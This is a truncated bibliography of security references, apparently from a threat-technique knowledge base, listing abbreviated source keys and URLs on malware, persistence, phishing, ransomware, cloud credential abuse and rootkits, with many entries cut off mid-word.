Launchctl SS64. (n.d. https://ss64.com/osx/launchctl.html
Dell DridexDell Securehttps://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
Crowdstri Bart Lenaehttps://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/
Targeted SSCheck Pointhttps://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/
CrowdStri Falcon Comhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-att
att_def_psHao, M. (2 https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/
inv_ps_att Hastings, Mhttps://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/
Mandiant Kirk, N. (2 https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique
PraetorianPraetorian https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/
creatingXPApple. (201https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Ch
Designing Apple. (n.dhttps://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Ch
CVMServerMickey Jin https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macO
Learn XPC EWojciech Re https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
Unit 42 PirFalcone, R.https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi
Broadcom Broadcom.https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages
CG 2014 CG. (2014, http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html
Unit 42 UnChen, J.. https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-re
Specter OpsMaddalena,https://posts.specterops.io/head-in-the-clouds-bd038bb69e48
SRD GPP Security R http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences
Meyers NuMeyers, A. http://www.crowdstrike.com/blog/whois-numbered-panda/
Moran 201Moran, N.,https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html
Rapid7G20Rapid7. (2 https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
Cylance DuGross, J. ( https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/res
Red CanaryMcCammon, https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/
FireEye At Berry, A., https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
Airbus SecuDove, A. (2https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/
FireEye FINCarr, N., e https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/HTML_Application
MSDN HTML Microsoft. https://msdn.microsoft.com/library/ms536471.aspx
LOLBAS MsLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Mshta/
Open LoginApple. (n.dhttps://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac
Adding LogApple. (201https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Ch
SMLoginIteTim Schroehttps://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/
Launch SerApple. (n.dhttps://developer.apple.com/documentation/coreservices/launch_services
ELC Runninhoakley. ( https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-laun
Login ItemApple. (n.dhttps://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//appl
Startup Itehoakley. (2https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/
hexed osx.fluffybunnyhttp://www.hexed.in/2019/07/osxdok-analysis.html
Add List R kalopromina https://gist.github.com/kaloprominat/6111584
objsee macPatrick Wahttps://objective-see.com/blog/blog_0x25.html
CheckPointOfer Caspi.https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
objsee net Patrick Warhttps://objective-see.com/blog/blog_0x44.html
objsee blocPatrick Warhttps://objective-see.com/blog/blog_0x31.html
Launch SerApple. (201https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/
Netskope GAshwin Vam https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection
Netskope CAshwin Vam https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-se
DigiCert InsDigiCert. ( https://www.digicert.com/kb/ssl-certificate-installation.htm
Malwarebyt Malwarebyte https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
ProofpointProofpointhttps://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian
Kaspersky-Dedenok, Rhttps://www.kaspersky.com/blog/malicious-redirect-methods/50045/
Cofense-reRaymond, N https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/
mandiant- Simonian, https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
VEC CloudFlarehttps://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendo
CrowdstrikCrowdstrikhttps://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
Mandiant-lDANIEL KAPhttps://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs
DOJ-DPRK H Department https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-c
FBI-BEC FBI. (2022)https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-re
FBI-ranso FBI. (n.d.) https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf
AP-NotPet FRANK BAJA https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8
Internet c IC3. (2022)https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf
BBC-RoninJoe Tidy. ( https://www.bbc.com/news/technology-60933174
wired-pig Lily Hay Nehttps://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/
NYT-ColoniNicole Perlhttps://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html
FireEye OuMcWhirt, M. https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-pa
Trellix-QakPham Duy P https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
FireEye Ke Shoorbajee, https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
ListObject Amazon - Lhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html
List Blobs Microsoft -https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs
Permiso GUIan Ahl. (2 https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
Cadet BlizzMicrosoft Thttps://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-di
WithSecureRuohonen,https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intellige
S
DuplicateTMicrosoft. https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetok
Unprotect Unprotect https://unprotect.it/technique/shortcut-hiding/
P
Booby TrapWeyne, F. (https://www.uperesia.com/booby-trapped-shortcut
Amnesty OA Amnesty Int https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-a
Auth0 Unde Auth0 Inc..https://auth0.com/learn/refresh-tokens/
Auth0 - WhAuth0. (n. https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
Cider SecurDaniel Kriv https://www.cidersecurity.io/top-10-cicd-security-risks/
KubernetesKubernetes. https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/
Microsoft -Microsoft. https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
Sophos At Ducklin, P. https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-b
GitHub PhiRyan Hansohttps://github.com/ryhanson/phishery
Crowdstrik Vaishnav https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
SpecterOpsAndy Robbin https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5
DemystifyinBellavance,https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
Lacework ADetecting Ahttps://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
GCP SSH K Google. (n.https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
Permiso ScIan Ahl. ( https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
Blue CloudKunz, Bruc https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815
Blue CloudKunz, Bryc https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
Microsoft Microsoft. https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
Mandiant AOfir Rozmahttps://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
Expel Behi S. Lipton, https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/
Sysdig ScarSCARLETEEL https://sysdig.com/blog/scarleteel-2-0/
Reliaquest Reliaquest https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
Telephone Selena Lar https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-a
proofpointTommy Madj https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
Apple SuppApple. (20 https://support.apple.com/en-us/HT203998
FireEye S FireEye. ( https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compr
Hide GDM Ji Mingkui. https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/
US-CERT T US-CERT. (2https://www.us-cert.gov/ncas/alerts/TA18-074A
LogonUserMicrosoft. https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw
ObscuresecCampbell, Chttps://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
Microsoft Microsoft. https://msdn.microsoft.com/library/cc422924.aspx
ADSecuritySean Metcahttps://adsecurity.org/?p=2288
AWS List RAmazon. (n.https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-
show_procCisco. (202https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_m
NPPSPY - H Dray Agha.https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-npps
NPPSPY Vi Grzegorz T https://www.youtube.com/watch?v=ggY3srD9dYs
NPPSPY Grzegorz T https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Network PrMicrosoft. https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api
NPLogonNoMicrosoft. https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify
Dell WMI PDell Secur https://www.secureworks.com/blog/wmi-persistence
FireEye W Devon Kerrhttps://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
Elastic - H French, D.,https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1
Mandiant Mandiant. https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmi
Microsoft Satran, M. https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-
Unit 42 So Falcone, R.https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan
Sans VirtuaKeragala, Dhttps://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techni
SentinelLa Alex Delamhttps://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the
Lacework LLacework La https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
Sysdig LLMLLMjacking:https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
Permiso SENathan Eadhttps://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
Fortinet Z ALEXANDER https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
SpecterOpsAndy Robbihttps://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959
Mitiga Sec Ariel Szarf https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan
XPNSec PPChester, A https://blog.xpnsec.com/becoming-system/
CounterCepLoh, I. (20 https://www.countercept.com/blog/detecting-parent-pid-spoofing/
Microsoft Montemayor https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-accou
Microsoft Schofield, https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
Secuirtyin Secuirtyinbhttps://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-pa
DidierStev Stevens, D https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-pro
CTD PPID STafani-Der https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/
SEC EDGARU.S. SEC. ( https://www.sec.gov/edgar/search-and-access
AWS Tempor AWS. (n.d.)https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html
GitHub AWS Damian Hichttps://github.com/pvanbuijtene/aws-adfs-credential-generator
Zimbra PreZimbra. (2 https://wiki.zimbra.com/wiki/Preauth
Russian 2FCatalin Cimhttps://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notificatio
MFA FatiguJessica Hawhttps://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to
Suspected Luke Jenkinhttps://www.mandiant.com/resources/russian-targeting-gov-business
Unit42 BanOr Chechikhttps://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n
ESET FontOVladislav Hhttps://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf
Slack SecurMichael Oshttps://www.nightfall.ai/blog/saas-slack-security-risks-2020
Microsoft Babinec, K.https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
SilentBrea Christensenhttps://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-withou
FireEye Po Dunwoody,https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
Github PSAHaight, J. https://github.com/Exploit-install/PSAttack-1
TechNet PoMicrosoft. https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx
Sixdub PowWarner, J..https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367
Microsoft Microsoft. https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
Microsoft FMicrosoft. https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/speci
Microsoft Plett, C. e https://docs.microsoft.com/windows-server/administration/windows-commands/assoc
TrendMicr Sioting, S. https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
Backtrace backtrace. https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
Syscall 201Drysdale, Dhttps://lwn.net/Articles/604515/
ELF Inject O'Neill, R. https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
VDSO Aug Petersson, https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
ESET Mache ESET. (201 https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
Bugcrowd RBugcrowd. https://www.bugcrowd.com/glossary/replay-attack/
(
ComparitecJustin Schahttps://www.comparitech.com/blog/information-security/what-is-a-replay-attack/
Storm-0558Microsoft Thttps://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-un
Microsoft M Microsoft Thttps://x.com/MsftSecIntel/status/1671579359994343425
Technet MMicrosoft. https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
magnusviriReynolds, http://www.magnusviri.com/Mac/what-is-emond.html
xorrior em Ross, Chri https://www.xorrior.com/emond-persistence/
NVD CVE-2National Vuhttps://nvd.nist.gov/vuln/detail/CVE-2017-0176
Trend MicrChris Taylohttps://blog.trendmicro.com/phishing-starts-inside/
Int SP - ch Microsoft Thttps://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-socia
Trend Micro Trend Microhttps://www.trendmicro.com/en_us/research.html
MalwarebyArntz, P. ( https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-reg
Oddvar MoMoe, O. (2 https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
CISA IT SerCISA. (n.d. https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers
Office 365 Microsoft. https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415
AWS CreatAWS. (n.d. https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html
AWS Lambda AWS. (n.d.)https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html
AWS InstanAWS. (n.d.)https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.ht
GCP CreateGoogle. (n.https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554
GCP ServicGoogle. (n.https://cloud.google.com/iam/docs/service-account-overview
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-director
Microsoft EMicrosoft. https://learn.microsoft.com/en-us/entra/identity-platform/app-objects-and-service-principals?tabs=bro
Cyware SocCyware Hachttps://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
Microsoft Franklin Smhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670
Microsoft Lich, B., M https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738
InsiderThr Warren, J. https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
GitHub Mim Warren, J. https://github.com/gentilkiwi/mimikatz/issues/92
Palo Alto OGrunzweig,http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset
Apple DevelApple. (201https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
Apple KernApple. (n.dhttps://developer.apple.com/support/kernel-extensions/
System andApple. (n.dhttps://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/w
GitHub RepAugusto, I. https://github.com/f0rb1dd3n/Reptile
Volatility Case, A. (2 https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
iDefense RChuvakin, Ahttps://www.megasecurity.org/papers/Rootkits.pdf
Linux LoadHenderson,http://tldp.org/HOWTO/Module-HOWTO/x197.html
GitHub Di Mello, V. ( https://github.com/m0nad/Diamorphine
Securelist Mikhail, K. https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
User ApproPikeralpha https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
Linux Kern Pomerantz,http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
Trend MicrRemillano, https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capab
Purves KexRichard Pu https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
RSAC 2015Wardle, P. https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
Synack SecWardle, P. https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
LogRhythmFoss, G. ( https://logrhythm.com/blog/do-you-trust-your-computer/
Spoofing crJohann Rehhttps://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
